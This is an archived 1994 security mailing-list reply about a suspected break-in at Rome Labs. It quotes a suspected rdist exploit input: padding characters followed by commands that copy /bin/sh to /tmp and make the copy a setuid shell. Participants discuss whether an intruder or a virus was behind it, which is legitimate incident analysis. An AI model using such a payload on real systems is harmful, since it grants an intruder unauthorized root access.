Re: Possible virus from Rome labs

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: *Hobbit*: "wu ftpd"
• Previous message: Evil Pete: "Re: Possible virus from Rome labs"
• In reply to: Evil Pete: "Re: Possible virus from Rome labs"
• Next in thread: Gene Spafford: "Re: Possible virus from Rome labs"

In message <199403310455.UAA15234@merde.dis.org>, Evil Pete writes:
>sounds like Crackers to me, not a virus.
>
Could be, but that should be easy to find out...

>if foosh contains some thing like
>
> Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
> Qaaaaaaaaaaaaaaaaaaaaaaaaaa
> Qaaaaaaaaaaaaaaaaaaaaaaaaa
> Qaaaaaaaaaaaaaaaaaaaaaaaa
> Qaaaaaaaaaaaaaaaaaaaaaaa
> Scp /bin/sh /tmp/foosh
> Schmod 4755 /tmp/foosh
>
>
>then it was something a person used to get root through a old hole in rdist
>(when I look for the file foosh I found it in my directory of security toys)
>
>
>as for jnk.tmp I am not sure yet.
>
Besides, they could have a virus that exploits that bug (or maybe some others too, like the evq driver)
 so as to infect more files. 
-Aggelos

• Next message: *Hobbit*: "wu ftpd"
• Previous message: Evil Pete: "Re: Possible virus from Rome labs"
• In reply to: Evil Pete: "Re: Possible virus from Rome labs"
• Next in thread: Gene Spafford: "Re: Possible virus from Rome labs"